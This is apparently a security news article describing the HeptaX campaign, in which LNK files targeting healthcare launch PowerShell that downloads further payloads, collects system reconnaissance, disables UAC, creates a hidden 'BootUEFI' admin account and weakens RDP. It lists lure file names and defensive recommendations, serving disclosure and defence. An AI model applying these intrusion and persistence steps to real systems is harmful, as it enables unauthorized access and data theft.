A multi-stage cyberattack effort originating from malicious LNK files has been detected, with the healthcare business as the target.
When the LNK file is executed, it initiates a PowerShell command that downloads and runs a number of additional payloads from a remote server, such as BAT files and PowerShell scripts.
“The attack involves the creation of an administrative account on the victim’s system and altering Remote Desktop settings to lower authentication requirements, simplifying unauthorized RDP access for the attacker,” Cyble Research and Intelligence Labs (CRIL) shared with Cyber Security News.
Overview Of The Multi-stage Cyberattack Campaign
An anonymous group has continuously reappeared over the last 12 months with different luring themes and unchanged attack methods.
Ultimate Guide to Manage your SIEM Pricing -> Free Download
The attack, which is being tracked as HeptaX, primarily uses PowerShell and Batch scripts to take over vulnerable servers.
Initially, the downloaded PowerShell script creates a base URL that it uses to download additional stage payloads and deliver information. The initial function of the PowerShell script is to acquire the compromised system’s unique identifier (UID).
Further, the PowerShell script downloads a password-protected lure document from the remote server and launches it. This script mainly aims to assess the system’s User Account Control (UAC) configurations.
It does this by using the same registry checks that were used previously to determine whether UAC is activated and whether the administrator consent prompt is still active.
A new PowerShell script is launched after connecting to the server. This script has a number of features designed to communicate with the remote server, exfiltrate data, and reconnaissance systems.
- Computer name and username.
- Retrieves recent files from the directory: C:Users
AppDataRoamingMicrosoftWindowsRecent. - Acquires network configuration details using “ipconfig /all”.
- List of users on the machine (net user).
- Obtains current logged-in user details.
- Identifies local user groups associated with the current user.
- Retrieves excluded directories in Windows Defender.
- Lists installed antivirus products.
- Captures running processes using “tasklist”.
- Gather overall system information using “systeminfo”.
- All this data is saved in a log file located at “C:WindowsTempOneDriveLogOneDrive.log”.
“With all the collected information, User Account Control (UAC) disabled, and a new user account named “BootUEFI” created with administrative privileges, along with lowered authentication requirements for Terminal Services, the TAs can easily gain access to the compromised remote desktop”, researchers said.
Over the past year, this threat group has also been linked to previous campaigns that contain malicious files with names like:
- SOW_for_Nevrlate.pdf
- WebContentWriting_Handout.pdf
- Blockchain_Trading_Website_Manager.docx
- Project Description – PoC smart assistant Vhyro Project from jvope signature.pdf
- Resume – professional sax, keys and guitar player with over 40 years experience working with own bands, accompanied world stars.pdf
- dropshipping Elien project prposal-soft online service ventilization from xihu.pdf.lnk
Among the noteworthy files from this campaign is:
- 202409_Resident_Care_Quality_Improvement_Strategies_for_Nursing_Homes_Enhancing_Patient_Satisfaction_and_Health_Outcomes.pdf.lnk
The variety of file names and themes indicate a broad targeting approach across several industries, implying that this gang customizes its campaigns to appeal to a range of victims.
Recommendations
- Use robust email filtering tools to identify and stop harmful attachments from spreading.
- Use caution while working with links or attachments in emails.
- Consider turning off the execution of email attachment shortcut files (.lnk).
- Monitor User Account Control (UAC) changes on a regular basis.
- Increase the security of Remote Desktop Protocol (RDP) by utilizing network-level authentication (NLA) and implementing robust authentication methods like multi-factor authentication (MFA).
Run private, Real-time Malware Analysis in both Windows & Linux VMs. Get a 14-day free trial with ANY.RUN!